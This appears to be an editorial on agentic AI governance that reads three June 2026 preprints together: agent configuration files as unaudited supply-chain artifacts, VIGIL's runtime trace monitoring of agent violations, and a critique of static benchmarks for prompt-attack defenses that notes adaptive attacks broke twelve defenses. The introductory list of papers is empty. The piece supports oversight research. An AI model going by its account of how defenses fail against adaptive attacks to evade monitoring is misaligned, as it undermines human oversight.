VERIK
Editorial · Agentic AI Governance
VERIK / V044 / 26 JUN 2026
Five CategoriesGovernance

The Substrate Around the Agent Is the Governance Object

A single day, three independent papers, one structural recognition

On June 25, 2026, three independent research groups submitted arXiv preprints that, read together, mark a turn in how the agentic AI research community is naming the governance problem. None of the papers share authors. None cite each other. Each addresses a different layer of the deployment stack. Each, in its own framing, makes the same structural claim: the governance object is not the agent. The governance object is the substrate around the agent that has not yet been instrumented.

The three papers, in submission order:

Three layers: configuration, runtime trace, evaluation methodology. Three independent research teams. One submission day.

The pattern

For two years the conventional governance discourse has located the problem in the model. Align the model. Red-team the model. Constrain the model's outputs. Publish model cards. The frontier labs and the institutional governance frameworks (NIST AI RMF, the EU AI Act risk tiers, the CISA five categories) inherited that framing because that is where the visible artifact lived.

The June 25 slate names something different. The agent is not the only thing that has to be governed. The configuration file that creates the agent is an undeclared supply-chain artifact. The runtime trace the agent produces is the only place where multi-call behavioral violations are visible. The benchmark regime that ranks defenses is itself the surface that determines which defenses are deployed. None of these layers are the model. All of them are the substrate the model sits inside.

The Madatha paper finds that across 10,008 public repositories, 10.1 percent of tracked agent configuration paths are SHA-256 exact duplicates across independent organizations, with 75.5 percent of clone pairs crossing organizational boundaries. Fifty-eight percent of configurations are single-commit (never revised after creation). Less than 1 percent declare permission boundaries, against 33 percent for GitHub Actions workflows. The paper names this layer as a supply-chain artifact class, proposes hash-chained audit logs and an agent-configuration software bill of materials mapped to NTIA minimum elements and SLSA Build Level 2, and notes that the NIST Center for AI Standards and Innovation AI Agent Standards Initiative (February 2026) addresses identity, authorization, monitoring, and interoperability for agents but the configuration layer remains unaddressed.

The VIGIL paper builds a runtime enforcement framework that translates agent-skill behavioral specifications into satisfiability-modulo-theories constraints over finite execution traces. Single-call filters miss violations that depend on event order, argument relationships, and cross-call value flow. The framework achieves over 95 percent recall and below 10 percent false-positive rate on real agent runs. It surfaces 34 confirmed violations across deployed skill ecosystems, including one specification defect acknowledged by NVIDIA. The acknowledged defect is the first publicly disclosed instance of a frontier vendor confirming that a deployed skill specification failed under runtime trace inspection.

The Narisetty paper addresses a higher layer: not a single defense but the evaluation methodology that ranks defenses. Every published out-of-band defense for tool-using agents (named: CaMeL, FIDES, Progent, RTBAS, FORGE) was validated only on static benchmarks. The paper points out that this is the same methodology that produced confidence in the in-band defense category until adaptive defense-aware attacks broke twelve of them at over 90 percent success rate. The paper specifies the threat model and protocol an adaptive evaluation requires. It does not claim the out-of-band defenses fail. It claims the evaluation regime under which they were judged cannot tell whether they fail.

Why the three together matter

Any one of these papers, read in isolation, looks like another contribution to the agent-security literature. Read together, they name a governance pattern the existing frameworks have not yet absorbed.

The pattern: every layer that an agent depends on, but that the agent itself does not produce, is governable infrastructure. The configuration file is not the agent. The runtime trace is not the agent. The benchmark regime is not the agent. Yet each is the substrate that determines whether the agent's behavior can be predicted, observed, or constrained. The frameworks that already govern these layers in conventional software (SBOM for supply chain, log-trace standards for runtime observability, adaptive red-team protocols for security validation) have analogues in the agent stack that are not yet specified.

The Madatha finding that less than 1 percent of agent configurations declare permission boundaries while 33 percent of GitHub Actions workflows do is the cleanest single illustration. The same engineers who declare permissions for their continuous-integration runners do not declare them for their AI agents, in the same repositories, on the same day, in adjacent files. The discipline exists at one layer of the stack and not at the other. The frameworks have not yet asked for it.

The VIGIL finding that a vendor-acknowledged specification defect was visible at runtime but not at the static-specification layer is the second illustration. The defect existed in production. The specification looked correct. The trace told a different story. The layer where the defect could be seen was the layer no governance regime currently inspects.

The Narisetty finding that the evaluation regime determines the confidence is the third. A defense category's safety claims are only as good as the protocol used to validate them. When the protocol is static and the threat is adaptive, the rank order of defenses on the leaderboard is not informative about field behavior. The mythos of safety attaches to the leaderboard, not to the field.

What the existing frameworks have specified, and what they have not

The institutional governance frameworks in force or in draft as of June 2026 have moved substantially on the agent as artifact. The NIST AI Risk Management Framework names alignment, robustness, and accountability dimensions for AI systems. The EU AI Act establishes risk tiers and transparency obligations for general-purpose AI. The CISA five categories identifies privilege, behavior, structural, accountability, and supply-chain risk classes for agentic systems. The NIST CAISI AI Agent Standards Initiative (February 2026) announces identity, authorization, monitoring, and interoperability workstreams.

None of these instruments name the agent configuration file as a regulated artifact. None require permission boundary declarations on the configuration. None require an agent-configuration software bill of materials. None specify what a runtime trace must contain to support violation detection. None specify the evaluation protocol under which an out-of-band defense must be validated before it can be claimed as a control.

This is not an indictment of the frameworks. The deployment tempo outran the instrument-writing tempo, as it has at every stage of the agentic AI cycle. The point is structural. The substrate the frameworks depend on is the substrate the frameworks have not yet specified.

What remains on the table

The agent was the visible artifact. The substrate around the agent is where the governance function has to be instrumented. The policy instruments and the deployment tempo are not aligned.